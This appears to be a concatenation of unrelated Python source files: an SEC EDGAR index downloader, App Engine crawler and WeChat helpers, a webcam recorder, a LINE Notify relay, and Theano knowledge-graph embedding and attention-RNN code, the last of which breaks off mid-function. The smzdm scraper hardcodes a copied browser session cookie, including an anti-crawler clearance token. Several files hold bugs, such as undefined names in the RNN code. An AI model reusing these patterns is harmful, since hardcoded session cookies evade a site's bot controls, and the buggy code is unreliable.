phrases.append((doc_id, span[0], span[1], span_lemma))
return phrases
@staticmethod
def normalize(text):
doc = NLP(text)
return ' '.join([token.lemma_.lower().strip() for token in doc])
def get_rankings(scores: ndarray, positive_ratio: float = 0.8):
'''
scores: (samples, class_num)
'''
class_num = scores.shape[-1]
rankings = (-scores).argsort(axis=0) #(samples, class_num)
rankings = rankings[:int(len(rankings) * 1.0 / class_num * positive_ratio)]
return rankings
``` |
{
"source": "Jiacheng-Liu/python-edgar",
"score": 3
} |
#### File: python-edgar/edgar/main.py
```python
from __future__ import print_function
import multiprocessing
import os
import datetime
import zipfile
import tempfile
import logging
import os.path
import sys
import io
EDGAR_PREFIX = "https://www.sec.gov/Archives/"
SEP = "|"
IS_PY3 = sys.version_info[0] >= 3
def _worker_count():
cpu_count = 1
try:
cpu_count = len(os.sched_getaffinity(0))
except AttributeError:
cpu_count = multiprocessing.cpu_count()
return cpu_count
def _get_current_quarter():
return "QTR%s" % ((datetime.date.today().month - 1) // 3 + 1)
def _quarterly_idx_list(since_year=1993):
"""
Generate the list of quarterly zip files archived in EDGAR
since 1993 until this previous quarter
"""
logging.debug("downloading files since %s" % since_year)
years = range(since_year, datetime.date.today().year + 1)
quarters = ["QTR1", "QTR2", "QTR3", "QTR4"]
history = list((y, q) for y in years for q in quarters)
history.reverse()
quarter = _get_current_quarter()
while history:
_, q = history[0]
if q == quarter:
break
else:
history.pop(0)
return [
(
EDGAR_PREFIX + "edgar/full-index/%s/%s/master.zip" % (x[0], x[1]),
"%s-%s.tsv" % (x[0], x[1]),
)
for x in history
]
def _append_html_version(line):
chunks = line.split(SEP)
return line + SEP + chunks[-1].replace(".txt", "-index.html")
def _skip_header(f):
for x in range(0, 11):
f.readline()
def _url_get(url):
content = None
if IS_PY3:
# python 3
import urllib.request
content = urllib.request.urlopen(url).read()
else:
# python 2
import urllib2
content = urllib2.urlopen(url).read()
return content
def _download(file, dest, skip_file):
"""
Download an idx archive from EDGAR
This will read idx files and unzip
archives + read the master.idx file inside
when skip_file is True, it will skip the file if it's already present.
"""
if not dest.endswith("/"):
dest = "%s/" % dest
url = file[0]
dest_name = file[1]
if skip_file and os.path.exists(dest+dest_name):
logging.info("> Skipping %s" % (dest_name))
return
if url.endswith("zip"):
with tempfile.TemporaryFile(mode="w+b") as tmp:
tmp.write(_url_get(url))
with zipfile.ZipFile(tmp).open("master.idx") as z:
with io.open(dest + dest_name, "w+", encoding="utf-8") as idxfile:
_skip_header(z)
lines = z.read()
if IS_PY3:
lines = lines.decode("latin-1")
lines = map(
lambda line: _append_html_version(line), lines.splitlines()
)
idxfile.write("\n".join(lines))
logging.info("> downloaded %s to %s%s" % (url, dest, dest_name))
else:
raise logging.error("python-edgar only supports zipped index files")
def download_index(dest, since_year, skip_all_present_except_last=False):
"""
Convenient method to download all files at once
"""
if not os.path.exists(dest):
os.makedirs(dest)
tasks = _quarterly_idx_list(since_year)
logging.info("%d index files to retrieve", len(tasks))
worker_count = _worker_count()
logging.debug("worker count: %d", worker_count)
pool = multiprocessing.Pool(worker_count)
for i, file in enumerate(tasks):
skip_file = skip_all_present_except_last
if i == 0:
# First one should always be re-downloaded
skip_file = False
pool.apply_async(_download, (file, dest, skip_file))
pool.close()
pool.join()
logging.info("complete")
``` |
{
"source": "jiachengpan/gae-crawler",
"score": 2
} |
#### File: gae-crawler/models/cron.py
```python
from google.appengine.ext import ndb
from google.appengine.api import memcache
from enum import Enum
class Interval(Enum):
ONE_HOUR = '1hour'
FIVE_MIN = '5min'
class CronJobs(ndb.Model):
interval = ndb.StringProperty(
choices=[member.value for name, member in Interval.__members__.items()])
type_name = ndb.StringProperty()
name = ndb.StringProperty()
parameters = ndb.JsonProperty()
last_update = ndb.DateTimeProperty(auto_now=True)
@classmethod
def get_jobs_by_interval(cls, interval):
ret = CronJobs.query(CronJobs.interval == interval).fetch(1000)
ret = [(r.type_name, r.name, r.parameters) for r in ret]
return ret
@classmethod
def get_jobs_by_type(cls, type_name):
ret = CronJobs.query(CronJobs.type_name == type_name).fetch(1000)
ret = [(r.type_name, r.name, r.parameters) for r in ret]
return ret
@classmethod
def add_job(cls, interval, type_name, name, parameters):
job_key = ndb.Key(cls, type_name + name)
if job_key.get(): return False
CronJobs(
key=job_key,
interval=interval,
type_name=type_name,
name=name,
parameters=parameters).put()
return True
@classmethod
def delete_job(cls, type_name, name):
ret = CronJobs.query(CronJobs.type_name == type_name, CronJobs.name == name).fetch(1000)
for r in ret:
r.key.delete()
return True
```
#### File: gae-crawler/proc/smzdm.py
```python
from bs4 import BeautifulSoup
from google.appengine.api import urlfetch
from google.appengine.api import memcache
from .proc_base import ProcedureBase
import logging
import gzip
import StringIO
HEADER = {
"User-Agent": 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36',
"Accept-Encoding": 'gzip',
"Accept-Language": 'zh,en-GB;q=0.8,en;q=0.6,en-US;q=0.4,zh-CN;q=0.2,zh-TW;q=0.2',
"Cookie": '__jsluid=69a744636a7d40e0aaf3730b176362ef; __jsl_clearance=1459684554.195|0|8CbvqQarDel3APMwTv923Kyhjoc%3D; smzdm_user_view=D5213364B546447774E885FEBBC186CC; smzdm_user_source=141572A247975F7D044FC79D7F822D52; PHPSESSID=794mdvr6kf6m0geundkht8nlu4; amvid=357b4c03b22e0a122677805bf58b6cfb',
}
# WIP
class ProcedureSMZDM(ProcedureBase):
@classmethod
def do_work_core(cls, args):
max_count = 100
if 'max_count' in args:
max_count = args['max_count']
try:
ret = urlfetch.fetch(
url=args['url'],
follow_redirects=True,
headers=HEADER,
deadline=60,
)
except Exception as e:
logging.error(e.message)
return []
if ret.status_code not in (200, 302):
logging.error('URL Fetch failed. status {0}; url {1}.'.format(ret.status_code, args['url']))
#return []
try:
content = gzip.GzipFile(fileobj=StringIO.StringIO(ret.content)).read()
except IOError:
content = ret.content
if not content:
logging.error('empty file')
return None
logging.info(content)
soup = BeautifulSoup(content, 'lxml')
items = soup.find_all('div', attrs={'class': 'search-list'})
result = []
msg = {}
for item in items[:max_count]:
title = item.find('div', attrs={'class': 'list-title'}).get_text().strip()
detail = item.find('div', attrs={'class', 'list-detail'}).get_text().strip()
result.append((title, detail))
return result
``` |
{
"source": "jiachengpan/wechat-rent",
"score": 2
} |
#### File: jiachengpan/wechat-rent/messenger.py
```python
from wechat_web import Wechat
import wechat_config
import logging
from google.appengine.api import memcache
cache_key = 'WECHAT_SESSION'
client = memcache.get(cache_key)
if not client:
try:
client = Wechat(wechat_config.account_name, wechat_config.account_passwd)
client.login()
client.get_fakeid()
client.get_available_users()
memcache.set(cache_key, client)
except Exception as e:
logging.error(repr(e))
def send_message(fake_id, message):
try:
client.send_message(fake_id, message)
except Exception as e:
logging.error(repr(e))
return False
return True
```
#### File: wechat-rent/utils/memcache.py
```python
from google.appengine.api import memcache
import pickle
def store(key, value, chunksize=950000):
serialized = pickle.dumps(value, 2)
values = {}
for i in xrange(0, len(serialized), chunksize):
values['%s.%s' % (key, i//chunksize)] = serialized[i : i+chunksize]
return memcache.set_multi(values)
def retrieve(key):
result = memcache.get_multi(['%s.%s' % (key, i) for i in xrange(32)])
serialized = ''.join([v for k, v in sorted(result.items()) if v is not None])
return pickle.loads(serialized)
``` |
{
"source": "jiachengx/cameracontrol",
"score": 3
} |
#### File: jiachengx/cameracontrol/camcapture.py
```python
import sys
import platform
import cv2
import datetime
if len(sys.argv) > 1:
if sys.argv[1] == "--help":
print("Usage: \n\t{0} [camera output size] e.g {1} 1280x720".format(sys.argv[0], sys.argv[0]))
sys.exit(0)
width, height = int(str(sys.argv[1]).split("x")[0]), int(str(sys.argv[1]).split("x")[1])
else:
width, height = 640, 480
def main():
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
if 'Windows' not in platform.system():
print("This app does NOT support non-windows platform.")
sys.exit(1)
encode = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter("camcapvid_" + f"{datetime.datetime.now():%Y%m%d_%H%M%S}" + ".avi" , encode, 20.0, (width, height))
while cap.isOpened():
ret, frame = cap.read()
if ret:
frame = cv2.flip(frame, 0)
out.write(frame)
cv2.imshow("Press 'q' to exit and export the output.avi video file in current folder.", frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
out.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
main()
``` |
{
"source": "jiachengx/MicroPython_ESP",
"score": 3
} |
#### File: MicroPython_ESP/heroku-line-app/app.py
```python
from __future__ import unicode_literals
from flask import Flask, request
import pprint
import json
import requests
app = Flask(__name__)
@app.route('/')
def homepage():
return "Done"
###############
# Line API
###############
@app.route('/line', methods=['GET', 'POST'])
def line():
url = "https://notify-api.line.me/api/notify"
token = request.args.get('token')
message = request.args.get('message')
headers = {"Authorization" : "Bearer "+ token}
payload = {"message" : message}
try:
r = requests.post(url ,headers = headers ,params=payload)
except Exception as ex:
print('line_notify() error: ', str(ex))
return 'ERROR'
return 'Done'
@app.route('/line2', methods=['GET', 'POST'])
def line2():
url = "https://notify-api.line.me/api/notify"
print('--.__dict__--')
pprint.pprint(request.__dict__)
print('--.data--')
pprint.pprint(request.data)
print('--.form--')
pprint.pprint(request.form)
print('--.args--')
pprint.pprint(request.args)
print('----')
'''
token = request.form['token']
message = request.form['message']
print(token, message)
'''
data = json.loads(request.data)
token = data['token']
message = data['message']
headers = {"Authorization" : "Bearer "+ token}
payload = {"message" : message}
try:
r = requests.post(url ,headers = headers ,params=payload)
except Exception as ex:
print('line_notify() error: ', str(ex))
return 'ERROR: '+str(ex)
return 'Done'
if __name__ == '__main__':
app.run(debug=True, use_reloader=True)
``` |
{
"source": "jiacheng-xu/Attn-KGE",
"score": 2
} |
#### File: Attn-KGE/LSTM_fix/cbow_att_launch.py
```python
__author__ = 'kanchan'
from util import *
from module import *
import theano
def transe(tparams, options, h_pos, t_pos, h_neg, t_neg, r_emb):
if options['distance'] == 'l1':
return tensor.maximum(0, options['margin'] + tensor.sum(tensor.abs_(h_pos + r_emb[:, 0, :] - t_pos), axis=1) - \
tensor.sum(tensor.abs_(h_neg + r_emb[:, 1, :] - t_neg), axis=1))
elif options['distance'] == 'l2':
return tensor.maximum(0, options['margin'] + tensor.sum(tensor.sqr(h_pos + r_emb[:, 0, :] - t_pos), axis=1) - \
tensor.sum(tensor.sqr(h_neg + r_emb[:, 1, :] - t_neg), axis=1))
else:
raise NotImplementedError('Illegal distance measure.')
# def dist_loss(tparams, options, h, h_text, t, t_text):
# return tensor.sum(tensor.sqr(h - h_text), axis=1) + tensor.sum(tensor.sqr(t - t_text), axis=1)
def calc_distance(tparams, options, h, r, t):
pass
def init_params(options):
params = OrderedDict()
if options['wdim'] != options['edim']:
W = ortho_weight(indim=options['wdim'], outdim=options['edim'])
params['cbow_W'] = W
if options['model_name'].endswith('gate'):
params['gate_emb'] = ortho_weight(options['ent_num'], options['edim'])
elif options['model_name'].endswith('gate_pro'):
params['gate_U'] = ortho_weight(options['edim'])
params['gate_W'] = ortho_weight(options['edim'])
params['gate_b'] = numpy.random.uniform(low=-.1,high=.1,size=(options['edim'],)).astype(config.floatX)
params = param_init_cbow(options, params, prefix='cbow', in_dim=options['wdim'], out_dim=options['edim'])
return params
def build_model(tparams, options, ttparams=None):
if ttparams == None:
ttparams = tparams
print 'Model: cbow'
use_noise = theano.shared(numpy_floatX(0.))
# head and tail load
ht = tensor.matrix('ht_triplet', dtype='int64')
r = tensor.matrix('r_triplet', dtype='int64')
n_samples = ht.shape[0]
ent_emb = ttparams['ent_emb'][ht.flatten()]
ent_emb = ent_emb.reshape([n_samples, 4, options['edim']])
# relation load
# Naive approach
rel_emb = ttparams['rel_emb'][r.flatten()]
rel_emb = rel_emb.reshape([n_samples, 2, options['edim']])
text = tensor.matrix('text', dtype='int64')
mask = tensor.matrix('text_mask')
#
# text input shape : seqth lenth, batch_size*4
#
# assert text.shape[1] == r.shape[0] * 4
text_emb = tparams['word_emb'][text.flatten()]
text_emb = text_emb.reshape([text.shape[0], text.shape[1], options['wdim']])
# rt_text = lstm(tparams, text_emb, options, mask=mask,in_dim=options['wdim'],out_dim=options['edim'])
# end_step = rt_text[-1]
end_step = cbow(tparams, text_emb, options, prefix='cbow', mask=mask, in_dim=options['wdim'],
out_dim=options['edim'])
if options['loss5']:
end_step = tensor.nnet.sigmoid(end_step)
#
if options['wdim'] != options['edim']:
end_step = theano.tensor.dot(end_step, tparams['cbow_W'])
# assert end_step.shape[0] % 4 == 0
h_pos_text, t_pos_text, h_neg_text, t_neg_text = end_step[0:r.shape[0]], \
end_step[r.shape[0]: r.shape[0] * 2], \
end_step[r.shape[0] * 2:r.shape[0] * 3], \
end_step[r.shape[0] * 3:r.shape[0] * 4],
# h_pos, t_pos, h_neg, t_neg, r_emb
# h + r - t
cost_ori = transe(tparams, options, ent_emb[:, 0, :], ent_emb[:, 1, :], ent_emb[:, 2, :], ent_emb[:, 3, :], rel_emb)
# h_rnn +r -t
cost_h_text = transe(tparams, options, h_pos_text, ent_emb[:, 1, :], h_neg_text, ent_emb[:, 3, :], rel_emb)
# h+r-rnn_t
cost_t_text = transe(tparams, options, ent_emb[:, 0, :], t_pos_text, ent_emb[:, 2, :], t_neg_text, rel_emb)
# h_rnn + r - t_rnn
cost_mul_text = transe(tparams, options, h_pos_text, t_pos_text, h_neg_text, t_neg_text, rel_emb)
f_loss_cost_ori = theano.function([ht, r, text, mask], outputs=cost_ori, updates=None, on_unused_input='ignore')
cost_ori_mean = cost_ori.mean()
f_loss_cost_h_text = theano.function([ht, r, text, mask], outputs=cost_h_text, updates=None,
on_unused_input='ignore')
cost_h_text_mean = cost_h_text.mean()
f_loss_cost_t_text = theano.function([ht, r, text, mask], outputs=cost_t_text, updates=None,
on_unused_input='ignore')
cost_t_text_mean = cost_t_text.mean()
f_loss_cost_mul_text = theano.function([ht, r, text, mask], outputs=cost_mul_text, updates=None,
on_unused_input='ignore')
cost_mul_text_mean = cost_mul_text.mean()
return use_noise, ht, r, text, mask, \
f_loss_cost_ori, cost_ori_mean, \
f_loss_cost_h_text, cost_h_text_mean, \
f_loss_cost_t_text, cost_t_text_mean, \
f_loss_cost_mul_text, cost_mul_text_mean
def build_test(tparams, options):
print 'Test Model: cbow'
text = tensor.matrix('text', dtype='int64')
mask = tensor.matrix('text_mask')
#
# text input shape : seqth_len, batch_size
#
# assert text.shape[1] == r.shape[0] * 4
text_emb = tparams['word_emb'][text.flatten()]
text_emb = text_emb.reshape([text.shape[0], text.shape[1], options['wdim']])
# rt_text = lstm(tparams, text_emb, options, mask=mask,in_dim=options['wdim'],out_dim=options['edim'])
# end_step = rt_text[-1]
end_step = cbow(tparams, text_emb, options, prefix='cbow', mask=mask)
if options['wdim'] != options['edim']:
end_step = theano.tensor.dot(end_step, tparams['cbow_W'])
return text, mask, end_step
```
#### File: Attn-KGE/LSTM_fix/lstm_launch.py
```python
from util import *
from module import *
import theano
def transe(tparams, options, h_pos, t_pos, h_neg, t_neg, r_emb):
if options['distance'] == 'l1':
return tensor.maximum(0, options['margin'] + tensor.sum(tensor.abs_(h_pos + r_emb[:, 0, :] - t_pos), axis=1) - \
tensor.sum(tensor.abs_(h_neg + r_emb[:, 1, :] - t_neg), axis=1))
elif options['distance'] == 'l2':
return tensor.maximum(0, options['margin'] + tensor.sum(tensor.sqr(h_pos + r_emb[:, 0, :] - t_pos), axis=1) - \
tensor.sum(tensor.sqr(h_neg + r_emb[:, 1, :] - t_neg), axis=1))
else:
raise NotImplementedError('Illegal distance measure.')
def init_params(options):
params = OrderedDict()
if options['model_name'].endswith('gate'):
params['gate_emb'] = ortho_weight(options['ent_num'], options['edim'])
elif options['model_name'].endswith('gate_pro'):
params['gate_U'] = ortho_weight(options['edim'])
params['gate_W'] = ortho_weight(options['edim'])
params['gate_b'] = numpy.random.uniform(low=-.1, high=.1, size=(options['edim'],)).astype(config.floatX)
elif options['model_name'].endswith('gate_s'):
params['gate_s'] = numpy.random.uniform(low=-.1, high=.3, size=(options['ent_num'],1)).astype(config.floatX)
if options['model_name'].find('att') != -1:
params = param_init_attention(options, params, prefix='attention', dim=options['edim'])
params = param_init_lstm(options, params, prefix='lstm', in_dim=options['wdim'], out_dim=options['edim'])
return params
def build_model(tparams, options, ttparams=None):
if ttparams == None:
ttparams = tparams
print 'Model: %s' % (options['model_name'])
trng = RandomStreams(817)
use_noise = theano.shared(numpy_floatX(0.))
# head and tail load
ht = tensor.matrix('ht_triplet', dtype='int64')
r = tensor.matrix('r_triplet', dtype='int64')
# assert ht.shape[0] == r.shape[0]
n_samples = ht.shape[0]
ent_emb = ttparams['ent_emb'][ht.flatten()]
ent_emb = ent_emb.reshape([n_samples, 4, options['edim']])
# relation load
# Naive approach
rel_emb = ttparams['rel_emb'][r.flatten()]
rel_emb = rel_emb.reshape([n_samples, 2, options['edim']])
text = tensor.matrix('text', dtype='int64')
mask = tensor.matrix('text_mask')
#
# text input shape : seqth lenth, batch_size*4
#
# assert text.shape[1] == r.shape[0] * 4
text_emb = tparams['word_emb'][text.flatten()]
text_emb = text_emb.reshape([text.shape[0], text.shape[1], options['wdim']])
rt_text = lstm(tparams, text_emb, options, mask=mask, in_dim=options['wdim'], out_dim=options['edim'])
# 97, 16, 128
if options['use_noise'] > 0.:
rt_text = dropout_layer(rt_text, use_noise, trng)
# assert end_step.shape[0] % 4 == 0
# h_pos, t_pos, h_neg, t_neg, r_emb
if options['model_name'].find('att') != -1:
h_pos_text, t_pos_text, h_neg_text, t_neg_text = rt_text[:, 0:r.shape[0], :], \
rt_text[:, r.shape[0]: r.shape[0] * 2, :], \
rt_text[:, r.shape[0] * 2:r.shape[0] * 3, :], \
rt_text[:, r.shape[0] * 3:r.shape[0] * 4, :]
pos_relation = rel_emb[:, 0, :].reshape([n_samples, options['edim']])
neg_relation = rel_emb[:, 1, :].reshape([n_samples, options['edim']])
h_pos_text = attention(tparams, h_pos_text, pos_relation, options, prefix='attention',
mask=mask[:, 0:r.shape[0]])
t_pos_text = attention(tparams, t_pos_text, pos_relation, options, prefix='attention',
mask=mask[:, r.shape[0]:r.shape[0] * 2])
h_neg_text = attention(tparams, h_neg_text, neg_relation, options, prefix='attention',
mask=mask[:, r.shape[0] * 2:r.shape[0] * 3])
t_neg_text = attention(tparams, t_neg_text, neg_relation, options, prefix='attention',
mask=mask[:, r.shape[0] * 3:r.shape[0] * 4])
# Assertion test
h_pos_text = h_pos_text.reshape((r.shape[0], options['edim']))
#####
end_step = tensor.concatenate([h_pos_text, t_pos_text, h_neg_text, t_neg_text], axis=0)
# end_step = concatenate([h_pos_text, t_pos_text, h_neg_text, t_neg_text], axis=0) # 4 * nsamples, dim
else:
# h_pos_text, t_pos_text, h_neg_text, t_neg_text = h_pos_text[-1], t_pos_text[-1], h_neg_text[-1], t_neg_text[-1]
# end_step = rt_text[-1]
proj = (rt_text * mask[:, :, None]).sum(axis=0)
end_step = proj / mask.sum(axis=0)[:, None]
h_pos_text, t_pos_text, h_neg_text, t_neg_text = end_step[0:r.shape[0]], \
end_step[r.shape[0]: r.shape[0] * 2], \
end_step[r.shape[0] * 2:r.shape[0] * 3], \
end_step[r.shape[0] * 3:r.shape[0] * 4],
# gate
f_loss_cost_gate, cost_gate_mean = None, None
if options['model_name'].endswith('gate'):
gate_emb = tparams['gate_emb'][ht.flatten()]
gate_emb = gate_emb.reshape([n_samples, 4, options['edim']])
sig_gate = tensor.nnet.sigmoid(gate_emb)
gated_state = sig_gate * ent_emb + (1 - sig_gate) * (
end_step.reshape((4, n_samples, options['edim']))).dimshuffle([1, 0, 2])
cost_gate = transe(tparams, options, gated_state[:, 0, :],
gated_state[:, 1, :], gated_state[:, 2, :],
gated_state[:, 3, :],
rel_emb)
f_loss_cost_gate = theano.function([ht, r, text, mask], outputs=cost_gate, updates=None,
on_unused_input='ignore')
cost_gate_mean = cost_gate.mean()
elif options['model_name'].endswith('gate_pro'):
# n_samples, 4, edim
txt = (end_step.reshape((4, n_samples, options['edim']))).dimshuffle([1, 0, 2])
alpha = tensor.nnet.sigmoid(tensor.dot(txt, tparams['gate_W']) +
tensor.dot(ent_emb, tparams['gate_U']) + tparams['gate_b'])
gated_state = alpha * ent_emb + (1 - alpha) * txt
cost_gate = transe(tparams, options, gated_state[:, 0, :],
gated_state[:, 1, :], gated_state[:, 2, :],
gated_state[:, 3, :],
rel_emb)
f_loss_cost_gate = theano.function([ht, r, text, mask], outputs=cost_gate, updates=None,
on_unused_input='ignore')
cost_gate_mean = cost_gate.mean()
elif options['model_name'].endswith('gate_s'):
###############TODO
gate_emb = tparams['gate_s'][ht.flatten()]
gate_emb = gate_emb.reshape([n_samples, 4])
sig_gate = tensor.nnet.sigmoid(gate_emb)
sig_gate = sig_gate[:,:,None]
gated_state = sig_gate * ent_emb + (1 - sig_gate) * (
end_step.reshape((4, n_samples, options['edim']))).dimshuffle([1, 0, 2])
cost_gate = transe(tparams, options, gated_state[:, 0, :],
gated_state[:, 1, :], gated_state[:, 2, :],
gated_state[:, 3, :],
rel_emb)
f_loss_cost_gate = theano.function([ht, r, text, mask], outputs=cost_gate, updates=None,
on_unused_input='ignore')
cost_gate_mean = cost_gate.mean()
# h + r - t
cost_ori = transe(tparams, options, ent_emb[:, 0, :], ent_emb[:, 1, :], ent_emb[:, 2, :], ent_emb[:, 3, :], rel_emb)
# h_rnn +r -t
cost_h_text = transe(tparams, options, h_pos_text, ent_emb[:, 1, :], h_neg_text, ent_emb[:, 3, :], rel_emb)
# h+r-rnn_t
cost_t_text = transe(tparams, options, ent_emb[:, 0, :], t_pos_text, ent_emb[:, 2, :], t_neg_text, rel_emb)
# h_rnn + r - t_rnn
cost_mul_text = transe(tparams, options, h_pos_text, t_pos_text, h_neg_text, t_neg_text, rel_emb)
f_loss_cost_ori = theano.function([ht, r, text, mask], outputs=cost_ori, updates=None, on_unused_input='ignore')
cost_ori_mean = cost_ori.mean()
f_loss_cost_h_text = theano.function([ht, r, text, mask], outputs=cost_h_text, updates=None,
on_unused_input='ignore')
cost_h_text_mean = cost_h_text.mean()
f_loss_cost_t_text = theano.function([ht, r, text, mask], outputs=cost_t_text, updates=None,
on_unused_input='ignore')
cost_t_text_mean = cost_t_text.mean()
f_loss_cost_mul_text = theano.function([ht, r, text, mask], outputs=cost_mul_text, updates=None,
on_unused_input='ignore')
cost_mul_text_mean = cost_mul_text.mean()
return use_noise, ht, r, text, mask, \
f_loss_cost_ori, cost_ori_mean, \
f_loss_cost_h_text, cost_h_text_mean, \
f_loss_cost_t_text, cost_t_text_mean, \
f_loss_cost_mul_text, cost_mul_text_mean, \
f_loss_cost_gate, cost_gate_mean
def build_test(tparams, options, ttparams=None, relation_vec=True):
if ttparams == None:
ttparams = tparams
trng = RandomStreams(45678)
print 'Test Model: lstm'
use_noise = theano.shared(numpy_floatX(0.))
text = tensor.matrix('text', dtype='int64')
mask = tensor.matrix('text_mask')
if relation_vec:
relation = tensor.vector('relation')
else:
relation = tensor.matrix('relation')
#
# text input shape : seqth_len, batch_size
#
# assert text.shape[1] == r.shape[0] * 4
text_emb = tparams['word_emb'][text.flatten()]
text_emb = text_emb.reshape([text.shape[0], text.shape[1], options['wdim']])
end_step = lstm(tparams, text_emb, options, mask=mask, in_dim=options['wdim'], out_dim=options['edim'])
if options['use_noise'] > 0.:
end_step = dropout_layer(end_step, use_noise, trng)
# assert end_step.shape[0] % 4 == 0
# h_pos, t_pos, h_neg, t_neg, r_emb
if options['model_name'].find('att') != -1:
end_step, alpha = attention(tparams, end_step, relation, options, prefix='attention', mask=mask)
else:
# proj = (end_step * mask[:, :, None]).sum(axis=0)
# end_step = proj / mask.sum(axis=0)[:, None]
pass
# gate
# TODO
# alpha = None
if options['model_name'].endswith('gate'):
gate_emb = tparams['gate_emb']
alpha = tensor.nnet.sigmoid(gate_emb)
gated_state = alpha * ttparams['ent_emb'] + (1 - alpha) * end_step
end_step = gated_state
elif options['model_name'].endswith('gate_pro'):
# n_samples, 4, edim
txt = end_step
alpha = tensor.nnet.sigmoid(tensor.dot(txt, tparams['gate_W']) +
tensor.dot(ttparams['ent_emb'], tparams['gate_U']) + tparams['gate_b'])
gated_state = alpha * ttparams['ent_emb'] + (1 - alpha) * txt
end_step = gated_state
elif options['model_name'].endswith('gate_s'):
gate_emb = tparams['gate_s']
sig_gate = tensor.nnet.sigmoid(gate_emb)
gated_state = sig_gate * ttparams['ent_emb'] + (1 - sig_gate) * end_step
end_step = gated_state
return text, mask, relation, end_step
```
#### File: Attn-KGE/LSTM_fix/rnn_batch_att.py
```python
import theano
import sys
from generate_data import generate_train_data, CharacterTable
import pdb
import numpy
import numpy as np
import os
from theano import tensor as T
from collections import OrderedDict
theano.config.mode = 'FAST_COMPILE'
class model(object):
def __init__(self, nh, nc, ne, natt, batch_size=64, attention_type='no_attention'):
'''
nh :: dimension of the hidden layer
nc :: number of classes
ne :: number of word embeddings in the vocabulary
natt :: dimension of hidden attention layer
'''
self.nh = nh
self.ne = ne
# parameters of the model
self.Wx_enc = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(ne, nh)).astype(theano.config.floatX))
self.Wx_dec = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(ne, nh)).astype(theano.config.floatX))
self.h0_enc = theano.shared(numpy.zeros((batch_size, nh), dtype=theano.config.floatX))
self.h0_dec = theano.shared(numpy.zeros((batch_size, nh), dtype=theano.config.floatX))
self.Wh_enc = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(nh, nh)).astype(theano.config.floatX))
self.Wh_dec = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(nh, nh)).astype(theano.config.floatX))
self.b = theano.shared(numpy.zeros(nc, dtype=theano.config.floatX))
self.W = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(nh, nc)).astype(theano.config.floatX))
# bundle
self.params = [self.Wx_enc, self.Wx_dec, self.Wh_enc, self.Wh_dec, self.W, self.b, self.h0_enc, self.h0_dec]
if attention_type == 'dnn':
self.natt = natt
self.W_att_enc = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(nh, natt)).astype(theano.config.floatX))
self.W_att_dec = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(nh, natt)).astype(theano.config.floatX))
self.W_att_out = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(natth)).astype(theano.config.floatX))
self.params += [self.W_att_enc, self.W_att_dec, self.W_att_out]
idxs_enc, idxs_dec = T.imatrix(), T.imatrix()
y = T.imatrix()
# shape (batch, seq, dim)
x_enc, x_dec = self.Wx_enc[idxs_enc], self.Wx_dec[idxs_dec]
# compute the encoder representation
def recurrence(x_t, h_tm1):
h_t = T.nnet.sigmoid(x_t + T.dot(h_tm1, self.Wh_enc))
return [h_t, h_t]
[h, s], _ = theano.scan(fn=recurrence, \
sequences=x_enc.dimshuffle(1, 0, 2), \
outputs_info=[self.h0_enc, None])
h_enc_last = h[-1, :]
# shape of h: (seq, batch, dim)
# No attention : return the last element of h_enc
def no_attention(h_enc, h_tm1):
return h_enc[-1, :]
# Simple MemNN style attention = similarity between h_enc and h_tm1
def attention_function_dot(h_enc, h_tm1):
attention_vector = T.nnet.softmax(T.dot(h_enc, h_tm1))
return (attention_vector.T * h_enc).sum(axis=0)
# TODO Attention computed with an NN (1 hidden layer for states mixing)
def attention_function_dnn(h_enc, h_tm1):
attn_hid = T.tanh(T.dot(h_enc, self.W_att_enc) + T.dot(h_tm1, self.W_att_dec))
attention_vector = T.nnet.softmax(T.dot(attn_hid, self.W_att_out.T))
return (attention_vector.T * h_enc).sum(axis=0)
if attention_type == 'dnn':
attention = attention_function_dnn
elif attention_type == 'dot':
attention = attention_function_dot
else:
attention = no_attention
# from the encoder representation, generate the sequence
def recurrence(x_t, h_tm1):
h_t = T.nnet.sigmoid(x_t + T.dot(h_tm1, self.Wh_dec) + attention(h, h_tm1))
s_t = T.nnet.softmax(T.dot(h_t, self.W) + self.b)
return [h_t, s_t]
[h_dec, s_dec], _ = theano.scan(fn=recurrence, \
sequences=x_dec.dimshuffle(1, 0, 2),
outputs_info=[self.h0_dec, None])
probas = s_dec.dimshuffle(1, 0, 2)
y_pred = T.argmax(probas, axis=2)
self.classify = theano.function(inputs=[idxs_enc, idxs_dec], outputs=y_pred)
self.debug = theano.function(inputs=[idxs_enc, idxs_dec, y],
outputs=[idxs_enc.shape, y.shape, x_enc.shape, h.shape, h_enc_last.shape,
h_dec.shape, s_dec.shape, probas.shape, y_pred.shape])
# cost and gradients and learning rate
lr = T.scalar('lr')
# nll = -T.mean(T.log(probas)[T.arange(y.shape[0]), y])
# nll = -T.mean(y * T.log(probas)+ (1.- y) * T.log(1. - probas))
gradients = T.grad(nll, self.params)
updates = OrderedDict((p, p - lr * g) for p, g in zip(self.params, gradients))
# theano functions
self.train = theano.function([idxs_enc, idxs_dec, y, lr], nll, updates=updates)
# generation part
h_tm1 = T.vector()
idxs_dec = T.iscalar()
h_t = T.nnet.sigmoid(self.Wx_dec[idxs_dec] + T.dot(h_tm1, self.Wh_dec) + attention(h, h_tm1))
s_t = T.nnet.softmax(T.dot(h_t, self.W) + self.b)
self.compute_h_enc = theano.function([idxs_enc], h)
self.generate_step = theano.function(inputs=[h_tm1, h, idxs_dec], outputs=[h_t, s_t])
def generate_text(self, idxs_enc, max_len=10):
h_T = self.compute_h_enc(idxs_enc)
cur_dec_idx = -1
y_pred = []
for i in range(max_len):
if i == 0:
h_tm1 = self.h0_dec.get_value()
